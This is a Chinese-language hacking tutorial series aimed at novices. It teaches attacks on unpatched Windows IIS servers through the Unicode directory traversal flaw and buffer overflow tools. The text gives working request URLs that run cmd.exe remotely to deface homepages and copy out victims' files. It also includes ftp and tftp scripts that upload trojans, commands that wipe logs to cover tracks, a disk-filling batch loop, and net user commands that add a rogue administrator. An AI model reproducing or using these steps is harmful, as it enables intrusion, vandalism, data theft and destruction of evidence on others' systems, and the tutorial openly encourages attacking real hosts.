掌握了那麼多信息,我們該做點什麼了,一般黑客入侵都是靠著系統漏洞,不會都傻傻地去暴力破解的。我們現在就要看看它有什麼漏洞。 對漏洞大家可能不太瞭解,我這裡也不能一一說明了,太多了,感興趣的話去論壇找freedom吧! 目前廣泛利用和存在的漏洞有:unicode,unicode後續,iis溢出,.idq,.frontpage extend,輸入法漏洞等等大漏洞。 至於如何確定,呵呵,絕對不會是一行一行地在ie中試吧,拿出x-scan吧,很好的掃描器哦! 稍微設置一下就上路吧!過了一會,呵呵,報告出來了,快看,哇!漏洞一大堆!這下賺了!各條漏洞都有詳細的信息,大家看吧,總比我說的準了。 現在這臺主機已經和我們成為親戚了,要讓這位親愛的親戚做點事,就要開始各種攻擊了,下回我們就探討一下最最可愛的unicode漏洞,各位可能就會在unicode中完成第一次黑客體驗,再見:) 基礎知識(2) 今天我們談談unicode漏洞,這可是基礎中的基礎,重點裡的重點,不懂的一定要好好學。 2000年10月17日中聯綠盟發佈了以下的安全公告: 微軟IIS 4.0 / 5.0 擴展UNICODE目錄遍歷漏洞 遠程漏洞:是 本地漏洞:是 發佈日期:2000年10月17日 更新日期:2000年10月17日 受影響的版本: Microsoft IIS 5.0 + Microsoft Windows NT 2000 Microsoft IIS 4.0 + Microsoft Windows NT 4.0 + Microsoft BackOffice 4.5 - Microsoft Windows NT 4.0 + Microsoft BackOffice 4.0 - Microsoft Windows NT 4.0 這可是中國乃至全球網絡安全界的一次大變節,入侵nt/2000系統變得如此簡單,不打補丁的死路一條。 下面開始正式學習: 一,UNICODE漏洞的原理 此漏洞從中文IIS4.0+SP6開始,還影響中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1, 中國臺灣繁體中文也同樣存在這樣的漏洞。 中文版的WIN2000中,UNICODE編碼 存在BUG,在UNICODE 編碼中 %c1%1c -〉 (0xc1 - 0xc0) * 0x40 + 0x1c = 0x5c = '/' %c0%2f -〉 (0xc0 - 0xc0) * 0x40 + 0x2f = 0x2f = '\' 在NT4中/編碼為%c1%9c 在英文版裡: WIN2000英文版%c0%af 在中文win2k裡:%c1%1c 此外還有多種編碼,不一一闡述。 本文例子均以win2k為準,其他類型請自行替換。 基礎知識(3) 二,一切從基礎開始 由於winnt\system32\cmd.exe的存在,使遠程執行命令變為可能,在瀏覽器裡輸入以下請求:(假設11.11.22.22有漏洞)

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir 學過dos的應該可以看懂,其實就是利用當中的非法請求使我們可以連到system32下,如果inetpub\目錄不合winnt同盤,或者目錄級數有改動,可能會引起請求失敗。 如果成功,那麼在瀏覽區可看到如下信息: Directory of C:\inetpub\scripts 2000-09-28 15:49 〈DIR〉 . 2000-09-28 15:49 〈DIR〉 .. (假設目錄中沒有文件,實際上有一大堆) 是不是有自己機器的感覺了,正點!就是這種感覺! cmd.exe相當與dos裡的command.com,因此,我們可以執行很多命令了!
http://11.11.22.22/msadc/..%c1%1 ... em32/cmd.exe?/c+dir (這個命令同樣道理) 大家請注意:/c後面的+,實際上,他就是空格,請記牢!dir開始就是dos命令了,我們可以更改一下:
11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\autoexec.bat+c:\winnt\auto.exe 會dos的朋友一定懂其意義了,不懂的請去看書 . 不用說,大家也知道我們就可以利用它來對有漏洞的機器展開攻擊了! 三,實戰演練 1,修改主頁!(是不是很爽?) 一般主頁位置在c:\inetpub\wwwroot下,但要是改了路徑,就需要找找了。 最方便的方法:在瀏覽器裡輸入 http://11.11.22.22/.ida要是有漏洞,那在瀏?..皇俏頤塹氖籽 ?/a> 分析法:用dir看各個盤符的根目錄,看可疑的就進去看,運氣好的在一分鐘裡找到,這要看運氣和直覺。 dir/s法:首先在看其主頁,找個圖片或連接,看它的文件名,比如,11.11.22.22首頁上有一幅圖片,右擊,屬性,看到了嗎?iloveu.gif,然後我們利用unicode輸入這條命令dir c:\iloveu.gif /s意味著查找c盤下所有目錄裡的iloveu.gif,注意實際應用時別忘了把空格改為+,如果沒有繼續找d盤,很快就能確定主頁目錄的。 找到了目錄,就要對它開刀了!一般默認收頁為index.htm,index.html,index.asp,default.htm,defautl.html,default.asp中的一個,現在我們確定11.11.22.22中為index.htm 那麼我們就修改它吧! 最方便的方法:echo法。echo是一個系統命令,主要用於設置回應開關,而echo cshu >c:\autoexe.bat就是把cshu加入autoexec.bat裡並刪除原有內容,echo cshunice >>c:\autoexec.bat就是加入cshunice但不刪除原有內容,這樣我們就可以逍遙的改了。

11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+echo+hackedbycshu+>c:\inetpub\wwwroot\index.htm 回應為:HTTP 500 - 內部服務器錯誤 通過對cmd的分析,袁哥得出一條簡便的方法,加入"符號
11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+hackedbycshu+>c:\inetpub\wwwroot\index.htm
11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd".exe?/c+echo+2001730+>>c:\inetpub\wwwroot\index.htm 回應為:cgi錯誤,不用理會 兩條命令一下,呵呵,再看看11.11.22.22,是不是烙上我們的大名了?不錯吧 而在實際操作中,可能袁哥的方法也會失效,這時,我們就可以copy cmd.exe 為另一個exe,記住路徑,用copy後的來echo 例如:
11.11.22.22/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+cmd.exe+c:\a.exe
11.11.22.22/scripts/..%c1%1c../a.exe?/c+echo+hackedbycshu+>c:\inetpub\wwwroot\index.htm 2,上傳法:echo有點不講道理,把人家的文件破壞了,要是想在主頁上增光添彩,那就應該用改好的主頁 基礎知識(4) 上傳,這個我們後面介紹。 幾點忠告: 1,對於沒有主頁的機器(就是正在建立的主頁),不要改它,這很沒水準,也很沒道德 2,echo前記得幫他們做好備份 3,不準在主頁里加入惡性語句 2,下載文件 要是有什麼有用的文件被你發現,那我們如何下載呢? 最簡單的方法:把文件copy至網頁目錄下。copy c:\email\baby.eml c:\inetpub\wwwroot\baby.zip,然後,下載11.11.22.22/baby.zip就行了,注意!實際應用中要記得對文件名進行修改,總之不能暴露。 別的方法:對不起,沒想好:) 3,最重要的上傳 一般方法:ftp法 首先建一個ftp腳本文件:c:\hehe.haha(名字亂取把),申請一個ftp賬號,然後用echo吧 echo+open ftp.cshu.com(ftp主機) > c:\hehe.haha echo+user yourname >> cc:\hehe.haha (yourname是用戶名) echo+yourpasswd >> c:\hehe.haha (yourpasswd是密碼) echo+get setup.exe >> c:\hehe.haha 要下載的文件 echo+quit >> c:\hehe.haha 完了以後:ftp+/s:c:\hehe.haha,由於是ftp主機,那麼速度一定很快,過一會setup.exe就會出現在當前目錄了(也就是cmd所在目錄) 別忘了先上傳到ftp主機,不要做馬大哈哦! 最簡單的方法:tftp法。 這種方法不用中轉服務器,首先準備一個tftp服務端,它的作用就是把你的機器做成一個tftp服務器,利用漏洞機器來下載(注意,運行tftp時不要運行其他的ftp軟件) 在這裡我推薦cisco tftp server,自己去找找把,實在沒有來找我:) 安裝好後運行,別忘了設置好默認目錄,否則會找不到文件 tftp命令:tftp -i 1.2.3.4 GET ihateu.exe c:\winnt\ihateu.exe(ihateu.exe在默認目錄裡) 1.2.3.4為你的ip,用unicode運行一下,會看到tftp server裡有反應了,這就好了,不一會,文件就傳上去了,方便把! 學會了上傳,我們就可以好好改主頁,還可以上傳木馬,還可以把程序放上去運行…………(運行程序和在dos裡一樣) 4,如何清除痕跡 雖然國內主機紀錄ip的不是很多,但萬事小心為妙,unicode權限達不到admin。用cleaniislog行不通,就…………直接刪吧! C:\winnt\system32\logfiles\*.* C:\winnt\ssytem32\config\*.evt C:\winnt\system32\dtclog\*.* C:\winnt\system32\*.log C:\winnt\system32\*.txt C:\winnt\*.txt C:\winnt\*.log 全……擦掉! 四,細節問題。 1,遇到長文件名怎麼辦? c:\program files\ 就用c:"program20%files"\ 2,遇到空格怎麼辦? %代替嘍,或者xx yy=xxyy~1 基礎知識(5) %代替嘍,或者xx yy=xxyy~1 3,如何做個很大的文件? 目的就是破壞啦!我不喜歡不過教教你們啦 @echo off echo big > c:\a.a :h copy c:\a.a+c:\a.a c:\a.a goto h 注意不要亂來啊! 4,輸入命令,沒反應或反應不對。 :)請檢查檢查再檢查命令的正確性,可能沒有漏洞,那就閃人!看在你看到這裡那麼給我面子的份上,在給你幾個吧!

http://www.exsample.com/scripts/ ... macr;..? ?./winnt/system32/cmd.exe?/c+dir+c :\ 或
http://www.exsample.com/msadc/.. ... 2/cmd.exe?/c+dir+c:\ 或
http://www.exsample.com/_vti_bin ... 2/cmd.exe?/c+dir+c:\ 或
http://www.exsample.com/_mem_bin ... 2/cmd.exe?/c+dir+c:\ 不一定有用哦! 5,如何找到unicode漏洞的主機 呵呵:)最好的方法自然是………………一個一個ping,一個一個試嘍:) 不要打我呀!我說我說。最好找一個cgi掃描器,unicode查找器多如牛毛,隨便找個吧! 6,我copy,del文件,怎麼顯示aceess denined? 這個不好辦了,由於unicode所擁有的權限有限,出現上述情況很正常,我們要做的便是提高自己的權限! 這個我會在今後介紹,現在你可以試試attrib attrib -r -h -s c:\autoexec.bat 再對autoexec.bat進行操作,看看有沒有效果,成功率不高,不好意思! 7,我黑了主頁,天下無敵? 我本來想對你說:"見你的鬼去吧!"不過想想不大禮貌,有失我紳士風度,所以改個口 echo主頁或改主頁在不懂黑客的人看起來很了不起,不過,它最多算是一個基礎,拿到admin才是我們的終極目標! 對cshu全體成員來說,不準去改正在建立的網頁!這是我們的原則! 要是你想耍耍威風,那也可以理解,那就去黑外國的,或者url欺騙也是個好選擇 8,我如何做更多的事? 第一,努力提高權限 第二,由於cmd的限制,我們可以做的不多,那就要程序幫忙,上傳吧!切記,要隱秘! 一,frontpage擴展攻擊。 為什麼把它放第一位呢?原因很簡單,它最最方便,frontpage服務器擴展是一種方便的遠程站點管理功能,可是由於某些網管注意文明用語的疏忽(為什麼注意文明用語滿街飛?)不設置訪問密碼,如果那樣的話,我們只要用一個frontpage就可以黑它了!!這完全不是黑客工具,但它確實辦到了,還要感謝注意文明用語網管和微軟啊! 具體做法: 1,準備frontpage,我是用dreamweaver的,但它不能黑啊:)最好是2000版,只是不要是老掉牙的版本就行了。 2,找一臺有frontpage擴展的主機,可以用流光,也可以用搜索引擎查找/_vti_pvt/,這是frontpage擴展的標誌。 3,接下來打開frontpage,(媽媽:你在幹什麼?回答:做網頁!媽媽:好孩子!)文件菜單下選擇"打開站點",然後在文件夾框裡寫入 http://11.11.22.22(我習慣用這個做例子,以...僮魍澄募恕?/a> 4,萬一跳出錯誤信息,表示有密碼(這個不算注意文明用語)這時我們試著用以下url,

http://11.11.22.22/_vti_pvt/service.pwd,這...盎箍梢願耐場?/a> 我的看法: 這個漏洞只能說明網管的疏忽,對我們而言是沒有什麼利用價值的,只可以改改網頁,也許這也夠了,但要進一步控制主機,此漏洞就無能為力。消遣時可以玩玩。 二,iis.printer溢出攻擊 據說緩衝區溢出攻擊是黑客入侵時70%所選的方法,看起來有點誇張,但確實有道理,因為暴力密碼破解在網絡上變得非常之慢,而像unicode的解碼漏洞所取得的權限又太低,而緩衝區溢出一般可取得system權限,是非常有用的! 具體原理我也不是很清楚,只能說個大概:當我們向系統發出超出緩衝區大小的數據處理請求時,便會引發溢出,並彈出錯誤對話框,我們常看到的"非法操作"其實也是可能是由於溢出。而當溢出時,eip發生錯誤,有彙編知識的朋友應該記得,eip是控制執行代碼的位置(順便問一下,有沒有會crack的高人,記得做我老師)這時加入一段惡性代碼,算好發生溢出時的eip值,這樣溢出時就會執行惡性代碼而不是當掉。非法操作我們知道多的不得了,因此……溢出攻擊是非常強大的! 由於彙編對於我們來說較難掌握,加之對溢出的瞭解很有限,那麼我們只能藉助高手們的程序來黑了。 具體方法: 1,準備iishack,本站有下載,該版本可以對多種系統進行攻擊。 2,用x-scan或流光掃描一個有iis.printer漏洞的主機,然後就可以攻擊了。 3,在命令行方式執行iis5hack (主機ip) (端口號,默認80)(系統代號,具體可參考程序的說明) ( shell口) 例如:iis5hack 11.11.22.22 80 1 111(以為在111端口開一個shell) 4,用nc或telnet連上,nc/telnet 11.11.22.22 111,成功的話就可以控制機器了,加個用戶,做個代理…… 我的看法: 這算是一個比較有用的漏洞了,它能幫助我們取得system權限,其實和admin差不了多少了,對於做一臺跳板是非常有利的,希望大家熟練掌握。 三,idq/ida漏洞溢出攻擊 這是時下很熱門的了,原理和上面的printer相似,目前我只找到了iis5的攻擊程序,在cshu裡也可以找到的,我們準備的是snake的gui版本,很方便的。 具體方法: 1,準備snakeiis溢出程序。可以從本站下載。 2,ida/idq漏洞很多的,但win2k的服務器就不是那麼普遍了,所以用你熟練的掃描器去找一打win2k的機器吧。 3,程序的界面是很傻瓜的,把ip填入,選擇好類型,按下溢出按鈕,顯示shellcode發送完畢。 4,telnet/nc到你設定好的端口,如果成功的話,會顯示目錄下的信息(因為默認shellcode是dir) 5,歡呼吧!再次溢出,別忘了改shellcode為你想要的代碼哦。 6,重複4,很快一臺新鮮的win2k被你控制了! 我的看法: 我很喜歡用這種攻擊,因為win2k的3389可以很方便的為我做事,省力地搞到一臺win2k,然後慢慢享用,爽到根尖細胞啊!大家應該掌握這項方法。 四,*bsd telnetd溢出攻擊 又是溢出,不過這個可是真正的熱點哦,最近紅盟等大型安全網站被黑就是因為這個!所以看看吧 具體方法: 1,使用fbsdhack for win2k來攻擊,本站有下載的 2,還是要找到這樣的主機,一般是xnix的,比較少的,用專門的掃描器吧,我會在不久放出來。 3,等吧!這個漏洞要發送的信息很大,大約16mb,可怕吧,所以最好用高速肉雞 4,有幸成功了,記得請我吃飯! 我的看法: 這個漏洞的利用比較有難度,從找機器開始就是。但作為黑客愛好者,我們沒有理由去迴避它! 五,密碼暴力破解 這是最最原始,也是最最基本的攻擊的方式了,利用字典文件或暴力模式,對密碼進行探測。費時費力,但若有經驗的話,可以縮短這一過程。 具體方法: 1,找一個破解器,有ftp,http,smtp,pop3,telnet等等類型。 2,找到一臺相應的主機。 3,設定一番,上路吧!你可以睡覺,可以去machine(就是做作業),可以去泡妞……就是不要傻等。為什麼呢?因為會傷視力的:)怎麼倒了一片,起來起來! 4,萬一成功了(之所以用這個詞,是因為成功率很低的)表明你運氣旺,趕緊下線,買彩票去吧 大家好,這幾天被cgi程序搞得頭昏腦脹,主要還是51的錯,什麼破東西,那麼多錯誤!現在只好暫時借人家的地方用。 這是菜鳥操的最後第二節,說實話我還可以寫很多的,但是作業還欠了一大堆:(為什麼我沒有滿舟的狗屎運?算了算了,我不合那種欺世盜名之輩一般見識,開始做操吧! 不知道大家對unicode和溢出攻擊是不是熟練了?沒有的要加油哦!今天我們來談談權限的提升。 在windows系統中,最高的權限掌握在administrators的手裡,在xnix中稱為root,我們要完全掌握一臺機器,拿到admin是不可或缺的。 首先說說最簡單的:system to admin 當我們用溢出攻擊成功後,其實我們已經拿到了system權限(具體看每種攻擊而可能有所不同)這時我們很容易拿到admin權限。首先看看一下命令: net user 察看用戶表 net user username pass /add(添加密碼為pass的用戶username) net localgroup 察看組 net localgroup guests cshu /add 把cshu用戶加入guests組 net use \\ip\ipc$ "password" /user:username 這是遠程連接的命令 假如我們溢出了11.11.22.22,那麼這樣做吧! net user (看到了iusr_machinename的用戶了,它一般沒什麼權限的) net user iusr_machinename cshu (把它的密碼設為cshu) net localgroup administrators iusr_machinename /add(加入administrators組) 這樣我們就擁有了iusr_machinename這一賬號,admin權限,簡單吧! 熟悉一下net use 命令: net use \\11.11.22.22\ipc$ "cshu" /user:iusr_machinename 建立連接 copy c:\haha.exe \\11.11.22.22\admin$ 把haha.exe 複製到機器c:\winnt\system32上,若是c$.d$,就表示c,d盤 net time \\11.11.22.22 看到了時間了,比如是8點 at \\11.11.22.22 8:03 haha.exe 就會在8點3分執行。 net use \\11.11.22.22 /delete 斷開連接 應該是很簡單的。這樣我們就可以隨心所欲地操作11.11.22.22了,admin是最高權限,所以沒有限制的:) 是不是很簡單?所以我是溢出是很厲害的攻擊方法。 3389知道吧!如果能進入,那麼用上面的命令也可以輕易拿到admin的,不過呢,有3389漏洞的機器已經不多了。看你運氣了!(本站有幾篇關於3389的好文章) 總的來說,還是unicode的機器最多,為什麼注意文明用語網管不會滅絕呢:)雖然unicode拿admin有一定難度,但還是要試試的。 首先,我們檢查一下unicode在這臺機器上的權限,一般看讀寫權限和運行權限。用copy 或del命令便可確定讀寫權限,然後上傳文件運行一下便可知道運行權限。


分享到:


相關文章: